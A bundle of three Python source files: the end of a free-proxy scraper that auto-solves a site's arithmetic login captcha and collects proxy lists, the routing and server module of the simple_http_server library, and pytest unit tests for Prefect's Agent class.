"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3682.0 Safari/537.36",
}
login_url = 'http://www.gatherproxy.com/subscribe/login'
cookie_html = basic_req(login_url, 3, header=headers)
verify_text = re.findall('<span class="blue">(.*?)</span>', cookie_html)[0]
verify_list = verify_text.replace('= ','').strip().split()
num_map = {'Zero': 0,'One': 1,'Two': 2, 'Three':3,'Four':4,'Fine':5,'Six':6,'Seven':7,'Eight': 8, 'Nine':9, 'Ten': 10}
verify_num = [verify_list[0], verify_list[2]]
for index, num in enumerate(verify_num):
if num.isdigit():
verify_num[index] = int(num)
elif num in num_map:
verify_num[index] = num_map[num]
else:
echo(0, 'Error', index)
# return False
verify_code = 0
error = True
operation = verify_list[1]
if operation == '+' or operation == 'plus' or operation == 'add' or operation == 'multiplied':
verify_code = verify_num[0] + verify_num[1]
error = False
if operation == '-' or operation == 'minus':
verify_code = verify_num[0] - verify_num[1]
error = False
if operation == 'X' or operation == 'multiplication':
verify_code = verify_num[0] * verify_num[1]
error = False
if error:
echo(0, 'Error', operation)
if not os.path.exists('%spassage'%data_dir):
echo(0, 'gather passage not exist!!!')
return
with codecs.open('%spassage'%data_dir, 'r', encoding='utf-8') as f:
passage = [index[:-1] for index in f.readlines()]
data = {'Username': passage[0], 'Password': passage[1], 'Captcha': str(verify_code)}
time.sleep(2.163)
r = requests.session()
r.cookies = cj.LWPCookieJar()
login_req = r.post(login_url, headers=headers, data=data, verify=False)
def load_gather(self):
"""
load gather proxy pool text
If failured, you should reactive the cookie.
"""
headers = {
'pragma': 'no-cache',
'cache-control': 'no-cache',
'Host': 'www.gatherproxy.com',
'Origin': 'http://www.gatherproxy.com',
'Referer': 'http://www.gatherproxy.com/proxylist/anonymity/?t=Transparent',
'Cookie': '_lang=en-US; _ga=GA1.2.1084455496.1548351129; _gid=GA1.2.1515017701.1552361687; ASP.NET_SessionId=ckin3pzyqyoyt3zg54zrtrct; _gat=1; arp_scroll_position=57',
'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
"Accept-Encoding": "",
"Accept-Language": "zh-CN,zh;q=0.9",
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3682.0 Safari/537.36",
}
url = 'http://www.gatherproxy.com/subscribe/infos'
try:
sid_url_req = requests.get(url, headers=headers, verify=False, timeout=10)
except:
return
sid_url_html = BeautifulSoup(sid_url_req.text, 'html.parser')
sid_url = sid_url_html.find_all('div', class_='wrapper')[1].find_all('a')[0]['href']
if len(sid_url.split('sid=')) < 2:
echo(0, 'cookie error')
self.get_cookie()
self.load_gather()
return
sid = sid_url.split('sid=')[1]
sid_url = 'http://www.gatherproxy.com' + sid_url
data = {'ID':sid , 'C': '', 'P': '', 'T': '', 'U': '0'}
gatherproxy = requests.post(sid_url, headers=headers, data=data, verify=False)
with codecs.open(data_dir + 'gatherproxy', 'w', encoding='utf-8') as f:
f.write(gatherproxy.text)
def load_proxies_list(self, types=2):
''' load proxies '''
SITES = ['http://www.proxyserverlist24.top/', 'http://www.live-socks.net/']
spider_pool = []
self.waitjudge = []
for site in SITES:
self.get_other_proxies(site)
if os.path.exists('{}gatherproxy'.format(data_dir)):
self.gatherproxy(3)
waitjudge = list(set(self.waitjudge))
waitjudge_http = ['http://' + ii for ii in waitjudge]
waitjudge_https = ['https://' + ii for ii in waitjudge]
if not types:
self.waitjudge = waitjudge_http
elif types == 1:
self.waitjudge = waitjudge_https
else:
self.waitjudge = (waitjudge_http + waitjudge_https)
echo(1, '-_-_-_-_-_-_-', len(waitjudge), 'Proxies wait to judge -_-_-_-_-_-_-')
def request_text(self, url):
''' requests text '''
req = basic_req(url, 2)
if req is None:
echo(0, url)
if can_retry(url):
self.request_text(url)
else:
return ''
else:
echo(1, url)
return req.text
def get_other_proxies(self, url):
''' get other proxies '''
text = self.request_text(url)
pages = re.findall(r'<h3[\s\S]*?<a.*?(http.*?\.html).*?</a>', '' if text is None else text)
if not len(pages ):
echo(0, 'Please do not frequently request {}!!!'.format(url))
else:
proxies = [re.findall(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}:\d{1,5}', self.request_text(ii)) for ii in pages]
self.waitjudge = [*self.waitjudge, *sum(proxies, [])]
def load_proxies_test(self):
''' load mode & test proxies '''
start = time.time()
self.load_proxies_list()
proxies_len = len(self.waitjudge)
self.threadjude()
canuse_len = len(self.canuse_proxies)
echo(1, '\nTotal Proxies num: {}\nCan use num: {}\nTime spend: {:.2f}s\n'.format(proxies_len, canuse_len,time.time() - start))
with open('{}canuse_proxies.txt'.format(data_dir), 'w') as f:
f.write('\n'.join(self.canuse_proxies))
if __name__ == '__main__':
if not os.path.exists(data_dir):
os.makedirs(data_dir)
parser = argparse.ArgumentParser(description='gunjianpan proxy pool code')
parser.add_argument('--model', type=int, default=0, metavar='model',help='model 0/1')
parser.add_argument('--is_service', type=bool, default=False, metavar='service',help='True or False')
parser.add_argument('--test_time', type=int, default=1, metavar='test_time',help='test_time')
model = parser.parse_args().model
a = GetFreeProxy()
if model == 1:
a.load_gather()
elif model == 0:
a.load_proxies_test()
else:
a.testdb(2)
|
http_server.py
|
# -*- coding: utf-8 -*-
"""
Copyright (c) 2018 Keijack Wu
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import json
import socket
import os
import re
import threading
import asyncio
from asyncio.base_events import Server
from asyncio.streams import StreamReader, StreamWriter
from ssl import PROTOCOL_TLS_SERVER, SSLContext
from collections import OrderedDict
from socketserver import ThreadingMixIn, TCPServer
from time import sleep
from urllib.parse import unquote
from typing import Any, Callable, Dict, List, Tuple
from simple_http_server import ControllerFunction, StaticFile
from .http_protocol_handler import HttpProtocolHandler, SocketServerStreamRequestHandlerWraper
from .wsgi_request_handler import WSGIRequestHandler
from .__utils import remove_url_first_slash, get_function_args, get_function_kwargs, get_path_reg_pattern
from .logger import get_logger
_logger = get_logger("simple_http_server.http_server")
class RoutingConf:
HTTP_METHODS = ["OPTIONS", "GET", "HEAD",
"POST", "PUT", "DELETE", "TRACE", "CONNECT"]
def __init__(self, res_conf={}):
self.method_url_mapping: Dict[str,
Dict[str, ControllerFunction]] = {"_": {}}
self.path_val_url_mapping: Dict[str, Dict[str, ControllerFunction]] = {
"_": OrderedDict()}
self.method_regexp_mapping: Dict[str, Dict[str, ControllerFunction]] = {
"_": OrderedDict()}
for mth in self.HTTP_METHODS:
self.method_url_mapping[mth] = {}
self.path_val_url_mapping[mth] = OrderedDict()
self.method_regexp_mapping[mth] = OrderedDict()
self.filter_mapping = OrderedDict()
self._res_conf = []
self.add_res_conf(res_conf)
self.ws_mapping = OrderedDict()
self.ws_path_val_mapping = OrderedDict()
self.error_page_mapping = {}
@property
def res_conf(self):
return self._res_conf
@res_conf.setter
def res_conf(self, val: Dict[str, str]):
self._res_conf.clear()
self.add_res_conf(val)
def add_res_conf(self, val: Dict[str, str]):
if not val or not isinstance(val, dict):
return
for res_k, v in val.items():
if res_k.startswith("/"):
k = res_k[1:]
else:
k = res_k
if k.endswith("/*"):
key = k[0:-1]
elif k.endswith("/**"):
key = k[0:-2]
elif k.endswith("/"):
key = k
else:
key = k + "/"
if v.endswith(os.path.sep):
val = v
else:
val = v + os.path.sep
self._res_conf.append((key, val))
self._res_conf.sort(key=lambda it: -len(it[0]))
def map_controller(self, ctrl: ControllerFunction):
url = ctrl.url
regexp = ctrl.regexp
method = ctrl.method
_logger.debug(
f"map url {url}|{regexp} with method[{method}] to function {ctrl.func}. ")
assert method is None or method == "" or method.upper() in self.HTTP_METHODS
_method = method.upper() if method is not None and method != "" else "_"
if regexp:
self.method_regexp_mapping[_method][regexp] = ctrl
else:
_url = remove_url_first_slash(url)
path_pattern, path_names = get_path_reg_pattern(_url)
if path_pattern is None:
self.method_url_mapping[_method][_url] = ctrl
else:
self.path_val_url_mapping[_method][path_pattern] = (
ctrl, path_names)
def _res_(self, path, res_pre, res_dir):
fpath = os.path.join(res_dir, path.replace(res_pre, ""))
_logger.debug(f"static file. {path} :: {fpath}")
fext = os.path.splitext(fpath)[1]
ext = fext.lower()
if ext in (".html", ".htm", ".xhtml"):
content_type = "text/html"
elif ext == ".xml":
content_type = "text/xml"
elif ext == ".css":
content_type = "text/css"
elif ext in (".jpg", ".jpeg"):
content_type = "image/jpeg"
elif ext == ".png":
content_type = "image/png"
elif ext == ".webp":
content_type = "image/webp"
elif ext == ".js":
content_type = "text/javascript"
elif ext == ".pdf":
content_type = "application/pdf"
elif ext == ".mp4":
content_type = "video/mp4"
elif ext == ".mp3":
content_type = "audio/mp3"
else:
content_type = "application/octet-stream"
return StaticFile(fpath, content_type)
def get_url_controller(self, path="", method="") -> Tuple[ControllerFunction, Dict, List]:
# explicitly url matching
if path in self.method_url_mapping[method]:
return self.method_url_mapping[method][path], {}, ()
elif path in self.method_url_mapping["_"]:
return self.method_url_mapping["_"][path], {}, ()
# url with path value matching
fun_and_val = self.__try_get_from_path_val(path, method)
if fun_and_val is None:
fun_and_val = self.__try_get_from_path_val(path, "_")
if fun_and_val is not None:
return fun_and_val[0], fun_and_val[1], ()
# regexp
func_and_groups = self.__try_get_from_regexp(path, method)
if func_and_groups is None:
func_and_groups = self.__try_get_from_regexp(path, "_")
if func_and_groups is not None:
return func_and_groups[0], {}, func_and_groups[1]
# static files
for k, v in self.res_conf:
if path.startswith(k):
def static_fun():
return self._res_(path, k, v)
return ControllerFunction(func=static_fun), {}, ()
return None, {}, ()
def __try_get_from_regexp(self, path, method):
for regex, ctrl in self.method_regexp_mapping[method].items():
m = re.match(regex, path)
_logger.debug(
f"regexp::pattern::[{regex}] => path::[{path}] match? {m is not None}")
if m:
return ctrl, tuple([unquote(v) for v in m.groups()])
return None
def __try_get_from_path_val(self, path, method):
for patterns, val in self.path_val_url_mapping[method].items():
m = re.match(patterns, path)
_logger.debug(
f"url with path value::pattern::[{patterns}] => path::[{path}] match? {m is not None}")
if m:
fun, path_names = val
path_values = {}
for idx in range(len(path_names)):
key = unquote(path_names[idx])
path_values[key] = unquote(m.groups()[idx])
return fun, path_values
return None
def map_filter(self, filter_conf: Dict[str, Any]):
# {"path": p, "url_pattern": r, "func": filter_fun}
path = filter_conf["path"] if "path" in filter_conf else ""
regexp = filter_conf["url_pattern"]
filter_fun = filter_conf["func"]
if path:
regexp = get_path_reg_pattern(path)[0]
if not regexp:
regexp = f"^{path}$"
_logger.debug(f"[path: {path}] map url regexp {regexp} to function: {filter_fun}")
self.filter_mapping[regexp] = filter_fun
def get_matched_filters(self, path):
return self._get_matched_filters(remove_url_first_slash(path)) + self._get_matched_filters(path)
def _get_matched_filters(self, path):
available_filters = []
for regexp, val in self.filter_mapping.items():
m = re.match(regexp, path)
_logger.debug(f"filter:: [{regexp}], path:: [{path}] match? {m is not None}")
if m:
available_filters.append(val)
return available_filters
def map_websocket_handler(self, endpoint, handler_class):
url = remove_url_first_slash(endpoint)
path_pattern, path_names = get_path_reg_pattern(url)
if path_pattern is None:
self.ws_mapping[url] = handler_class
else:
self.ws_path_val_mapping[path_pattern] = (
handler_class, path_names)
def get_websocket_handler(self, path):
if path in self.ws_mapping:
return self.ws_mapping[path], {}
return self.__try_get_ws_handler_from_path_val(path)
def __try_get_ws_handler_from_path_val(self, path):
for patterns, val in self.ws_path_val_mapping.items():
m = re.match(patterns, path)
_logger.debug(
f"websocket endpoint with path value::pattern::[{patterns}] => path::[{path}] match? {m is not None}")
if m:
clz, path_names = val
path_values = {}
for idx in range(len(path_names)):
key = unquote(path_names[idx])
path_values[key] = unquote(m.groups()[idx])
return clz, path_values
return None, {}
def map_error_page(self, code: str, error_page_fun: Callable):
if not code:
c = "_"
else:
c = str(code).lower()
self.error_page_mapping[c] = error_page_fun
def _default_error_page(self, code: int, message: str = "", explain: str = ""):
return json.dumps({
"code": code,
"message": message,
"explain": explain
})
def error_page(self, code: int, message: str = "", explain: str = ""):
c = str(code)
func = None
if c in self.error_page_mapping:
func = self.error_page_mapping[c]
elif code > 200:
c0x = c[0:2] + "x"
if c0x in self.error_page_mapping:
func = self.error_page_mapping[c0x]
elif "_" in self.error_page_mapping:
func = self.error_page_mapping["_"]
if not func:
func = self._default_error_page
_logger.debug(f"error page function:: {func}")
co = code
msg = message
exp = explain
args_def = get_function_args(func, None)
kwargs_def = get_function_kwargs(func, None)
args = []
for n, t in args_def:
_logger.debug(f"set value to error_page function -> {n}")
if co is not None:
if t is None or t == int:
args.append(co)
co = None
continue
if msg is not None:
if t is None or t == str:
args.append(msg)
msg = None
continue
if exp is not None:
if t is None or t == str:
args.append(exp)
exp = None
continue
args.append(None)
kwargs = {}
for n, v, t in kwargs_def:
if co is not None:
if (t is None and isinstance(v, int)) or t == int:
kwargs[n] = co
co = None
continue
if msg is not None:
if (t is None and isinstance(v, str)) or t == str:
kwargs[n] = msg
msg = None
continue
if exp is not None:
if (t is None and isinstance(v, str)) or t == str:
kwargs[n] = exp
exp = None
continue
kwargs[n] = v
if args and kwargs:
return func(*args, **kwargs)
elif args:
return func(*args)
elif kwargs:
return func(**kwargs)
else:
return func()
class HTTPServer(TCPServer, RoutingConf):
allow_reuse_address = 1 # Seems to make sense in testing environment
def server_bind(self):
"""Override server_bind to store the server name."""
TCPServer.server_bind(self)
host, port = self.server_address[:2]
self.server_name = socket.getfqdn(host)
self.server_port = port
def __init__(self, addr, res_conf={}):
TCPServer.__init__(self, addr, SocketServerStreamRequestHandlerWraper)
RoutingConf.__init__(self, res_conf)
class ThreadingMixInHTTPServer(ThreadingMixIn, HTTPServer):
def start(self):
self.serve_forever()
def _shutdown(self) -> None:
_logger.debug("shutdown http server in a seperate thread..")
super().shutdown()
def shutdown(self) -> None:
threading.Thread(target=self._shutdown, daemon=False).start()
class CoroutineHTTPServer(RoutingConf):
def __init__(self, host: str = '', port: int = 9090, ssl: SSLContext = None, res_conf={}) -> None:
RoutingConf.__init__(self, res_conf)
self.host: str = host
self.port: int = port
self.ssl: SSLContext = ssl
self.server: Server = None
async def callback(self, reader: StreamReader, writer: StreamWriter):
handler = HttpProtocolHandler(reader, writer, routing_conf=self)
await handler.handle_request()
_logger.debug("Connection ends, close the writer.")
writer.close()
async def start_server(self):
self.server = await asyncio.start_server(
self.callback, host=self.host, port=self.port, ssl=self.ssl)
async with self.server:
try:
await self.server.serve_forever()
except asyncio.exceptions.CancelledError:
_logger.debug(
"Some requests are lost for the reason that the server is shutted down.")
finally:
await self.server.wait_closed()
def start(self):
asyncio.run(self.start_server())
def _shutdown(self):
_logger.debug("Try to shutdown server.")
self.server.close()
loop = self.server.get_loop()
loop.call_soon_threadsafe(loop.stop)
def shutdown(self):
wait_time = 3
while wait_time:
sleep(1)
_logger.debug(f"couting to shutdown: {wait_time}")
wait_time = wait_time - 1
if wait_time == 0:
_logger.debug("shutdown server....")
self._shutdown()
class SimpleDispatcherHttpServer:
"""Dispatcher Http server"""
def map_filter(self, filter_conf):
self.server.map_filter(filter_conf)
def map_controller(self, ctrl: ControllerFunction):
self.server.map_controller(ctrl)
def map_websocket_handler(self, endpoint, handler_class):
self.server.map_websocket_handler(endpoint, handler_class)
def map_error_page(self, code, func):
self.server.map_error_page(code, func)
def __init__(self,
host: Tuple[str, int] = ('', 9090),
ssl: bool = False,
ssl_protocol: int = PROTOCOL_TLS_SERVER,
ssl_check_hostname: bool = False,
keyfile: str = "",
certfile: str = "",
keypass: str = "",
ssl_context: SSLContext = None,
resources: Dict[str, str] = {},
prefer_corountine=False):
self.host = host
self.__ready = False
self.ssl = ssl
if ssl:
if ssl_context:
self.ssl_ctx = ssl_context
else:
assert keyfile and certfile, "keyfile and certfile should be provided. "
ssl_ctx = SSLContext(protocol=ssl_protocol)
ssl_ctx.check_hostname = ssl_check_hostname
ssl_ctx.load_cert_chain(
certfile=certfile, keyfile=keyfile, password=keypass)
self.ssl_ctx = ssl_ctx
else:
self.ssl_ctx = None
if prefer_corountine:
_logger.info(f"Start server in corouting mode, listen to port: {self.host[1]}")
self.server = CoroutineHTTPServer(
self.host[0], self.host[1], self.ssl_ctx, resources)
else:
_logger.info(f"Start server in threading mixed mode, listen to port {self.host[1]}")
self.server = ThreadingMixInHTTPServer(self.host, resources)
if self.ssl_ctx:
self.server.socket = self.ssl_ctx.wrap_socket(
self.server.socket, server_side=True)
@ property
def ready(self):
return self.__ready
def resources(self, res={}):
self.server.res_conf = res
def start(self):
try:
self.__ready = True
self.server.start()
except:
self.__ready = False
raise
def shutdown(self):
# shutdown it in a seperate thread.
self.server.shutdown()
class WSGIProxy(RoutingConf):
def __init__(self, res_conf):
super().__init__(res_conf=res_conf)
def app_proxy(self, environment, start_response):
return asyncio.run(self.async_app_proxy(environment, start_response))
async def async_app_proxy(self, environment, start_response):
requestHandler = WSGIRequestHandler(self, environment, start_response)
return await requestHandler.handle_request()
|
test_agent.py
|
import logging
import socket
import time
from unittest.mock import MagicMock
import pytest
from prefect.agent import Agent
from prefect.engine.state import Scheduled
from prefect.utilities.configuration import set_temporary_config
from prefect.utilities.exceptions import AuthorizationError
from prefect.utilities.graphql import GraphQLResult
def test_agent_init(cloud_api):
agent = Agent()
assert agent
def test_multiple_agent_init_doesnt_duplicate_logs(cloud_api):
a, b, c = Agent(), Agent(), Agent()
assert len(c.logger.handlers) == 1
def test_agent_config_options(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent()
assert agent.labels == []
assert agent.env_vars == dict()
assert agent.max_polls is None
assert agent.client.get_auth_token() == "TEST_TOKEN"
assert agent.name == "agent"
assert agent.logger
assert agent.logger.name == "agent"
def test_agent_name_set_options(monkeypatch, cloud_api):
# Default
agent = Agent()
assert agent.name == "agent"
assert agent.logger.name == "agent"
# Init arg
agent = Agent(name="test1")
assert agent.name == "test1"
assert agent.logger.name == "test1"
# Config
with set_temporary_config({"cloud.agent.name": "test2"}):
agent = Agent()
assert agent.name == "test2"
assert agent.logger.name == "test2"
def test_agent_log_level(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent()
assert agent.logger.level == 20
def test_agent_log_level_responds_to_config(cloud_api):
with set_temporary_config(
{
"cloud.agent.auth_token": "TEST_TOKEN",
"cloud.agent.level": "DEBUG",
"cloud.agent.agent_address": "http://localhost:8000",
}
):
agent = Agent()
assert agent.logger.level == 10
assert agent.agent_address == "http://localhost:8000"
def test_agent_env_vars(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(env_vars=dict(AUTH_THING="foo"))
assert agent.env_vars == dict(AUTH_THING="foo")
def test_agent_env_vars_from_config(cloud_api):
with set_temporary_config(
{
"cloud.agent.auth_token": "TEST_TOKEN",
"cloud.agent.env_vars": {"test1": "test2", "test3": "test4"},
}
):
agent = Agent()
assert agent.env_vars == {"test1": "test2", "test3": "test4"}
def test_agent_max_polls(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(max_polls=10)
assert agent.max_polls == 10
def test_agent_labels(cloud_api):
with set_temporary_config({"cloud.agent.auth_token": "TEST_TOKEN"}):
agent = Agent(labels=["test", "2"])
assert agent.labels == ["test", "2"]
def test_agent_labels_from_config_var(cloud_api):
with set_temporary_config({"cloud.agent.labels": ["test", "2"]}):
agent = Agent()
assert agent.labels == ["test", "2"]
def test_agent_log_level_debug(cloud_api):
with set_temporary_config(
{"cloud.agent.auth_token": "TEST_TOKEN", "cloud.agent.level": "DEBUG"}
):
agent = Agent()
assert agent.logger.level == 10
def test_agent_fails_no_auth_token(cloud_api):
with pytest.raises(AuthorizationError):
agent = Agent().start()
def test_agent_fails_no_runner_token(monkeypatch, cloud_api):
post = MagicMock(
return_value=MagicMock(
json=MagicMock(
return_value=dict(
data=dict(auth_info=MagicMock(api_token_scope="USER"))
)
)
)
)
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
with pytest.raises(AuthorizationError):
agent = Agent().start()
def test_query_flow_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[{"id": "id"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
flow_runs = agent.query_flow_runs()
assert flow_runs == [{"id": "id"}]
def test_query_flow_runs_ignores_currently_submitting_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["id1", "id2"]),
flow_run=[{"id1": "id1"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
agent.submitting_flow_runs.add("id2")
agent.query_flow_runs()
assert len(gql_return.call_args_list) == 2
assert (
'id: { _in: ["id1"] }'
in list(gql_return.call_args_list[1][0][0]["query"].keys())[0]
)
def test_query_flow_runs_does_not_use_submitting_flow_runs_directly(
monkeypatch, caplog, cloud_api
):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
get_runs_in_queue=MagicMock(flow_run_ids=["already-submitted-id"]),
flow_run=[{"id": "id"}],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
agent.logger.setLevel(logging.DEBUG)
copy_mock = MagicMock(return_value=set(["already-submitted-id"]))
agent.submitting_flow_runs = MagicMock(copy=copy_mock)
flow_runs = agent.query_flow_runs()
assert flow_runs == []
assert "1 already submitting: ['already-submitted-id']" in caplog.text
copy_mock.assert_called_once_with()
def test_update_states_passes_no_task_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.update_state(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [],
}
)
)
def test_update_states_passes_task_runs(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.update_state(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
)
def test_mark_failed(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(set_flow_run_state=None, set_task_run_state=None)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
agent = Agent()
assert not agent.mark_failed(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [],
}
),
exc=Exception(),
)
def test_deploy_flows_passes_base_agent(cloud_api):
agent = Agent()
with pytest.raises(NotImplementedError):
agent.deploy_flow(None)
def test_heartbeat_passes_base_agent(cloud_api):
agent = Agent()
assert not agent.heartbeat()
def test_agent_connect(monkeypatch, cloud_api):
post = MagicMock(return_value=MagicMock(json=MagicMock(return_value="hello")))
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
agent = Agent()
assert agent.agent_connect() is None
def test_agent_connect_handled_error(monkeypatch, cloud_api):
post = MagicMock(side_effect=Exception)
session = MagicMock()
session.return_value.post = post
monkeypatch.setattr("requests.Session", session)
agent = Agent()
assert agent.agent_connect() is None
def test_on_flow_run_deploy_attempt_removes_id(monkeypatch, cloud_api):
agent = Agent()
agent.submitting_flow_runs.add("id")
agent.on_flow_run_deploy_attempt(None, "id")
assert len(agent.submitting_flow_runs) == 0
def test_agent_process(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
set_task_run_state=None,
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[
GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
future_mock = MagicMock()
executor.submit = MagicMock(return_value=future_mock)
agent = Agent()
assert agent.agent_process(executor)
assert executor.submit.called
assert future_mock.add_done_callback.called
def test_agent_process_no_runs_found(monkeypatch, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(
data=MagicMock(
set_flow_run_state=None,
set_task_run_state=None,
get_runs_in_queue=MagicMock(flow_run_ids=["id"]),
flow_run=[],
)
)
)
client = MagicMock()
client.return_value.graphql = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
agent = Agent()
assert not agent.agent_process(executor)
assert not executor.submit.called
def test_agent_logs_flow_run_exceptions(monkeypatch, caplog, cloud_api):
gql_return = MagicMock(
return_value=MagicMock(data=MagicMock(write_run_logs=MagicMock(success=True)))
)
client = MagicMock()
client.return_value.write_run_logs = gql_return
monkeypatch.setattr("prefect.agent.agent.Client", MagicMock(return_value=client))
agent = Agent()
agent.deploy_flow = MagicMock(side_effect=Exception("Error Here"))
agent.deploy_and_update_flow_run(
flow_run=GraphQLResult(
{
"id": "id",
"serialized_state": Scheduled().serialize(),
"version": 1,
"task_runs": [
GraphQLResult(
{
"id": "id",
"version": 1,
"serialized_state": Scheduled().serialize(),
}
)
],
}
)
)
assert client.write_run_logs.called
client.write_run_logs.assert_called_with(
[dict(flow_run_id="id", level="ERROR", message="Error Here", name="agent")]
)
assert "Logging platform error for flow run" in caplog.text
def test_agent_process_raises_exception_and_logs(monkeypatch, cloud_api):
client = MagicMock()
client.return_value.graphql.side_effect = ValueError("Error")
monkeypatch.setattr("prefect.agent.agent.Client", client)
executor = MagicMock()
agent = Agent()
with pytest.raises(Exception):
agent.agent_process(executor, "id")
assert client.write_run_log.called
def test_agent_start_max_polls(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=1)
agent.start()
assert on_shutdown.called
assert agent_process.called
assert heartbeat.called
def test_agent_start_max_polls_count(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=2)
agent.start()
assert on_shutdown.call_count == 1
assert agent_process.call_count == 2
assert heartbeat.call_count == 2
def test_agent_start_max_polls_zero(monkeypatch, runner_token, cloud_api):
on_shutdown = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.on_shutdown", on_shutdown)
agent_process = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.agent_process", agent_process)
agent_connect = MagicMock(return_value="id")
monkeypatch.setattr("prefect.agent.agent.Agent.agent_connect", agent_connect)
heartbeat = MagicMock()
monkeypatch.setattr("prefect.agent.agent.Agent.heartbeat", heartbeat)
agent = Agent(max_polls=0)
agent.start()
assert on_shutdown.call_count == 1
assert agent_process.call_count == 0
assert heartbeat.call_count == 0
def test_agent_registration_and_id(monkeypatch, cloud_api):
monkeypatch.setattr("prefect.agent.agent.Agent._verify_token", MagicMock())
monkeypatch.setattr(
"prefect.agent.agent.Client.register_agent", MagicMock(return_value="ID")
)
agent = Agent(max_polls=1)
agent.start()
assert agent._register_agent() == "ID"
assert agent.client._attached_headers == {"X-PREFECT-AGENT-ID": "ID"}
def test_agent_health_check(cloud_api):
requests = pytest.importorskip("requests")
class TestAgent(Agent):
def agent_connect(self):
pass
with socket.socket() as sock:
sock.bind(("", 0))
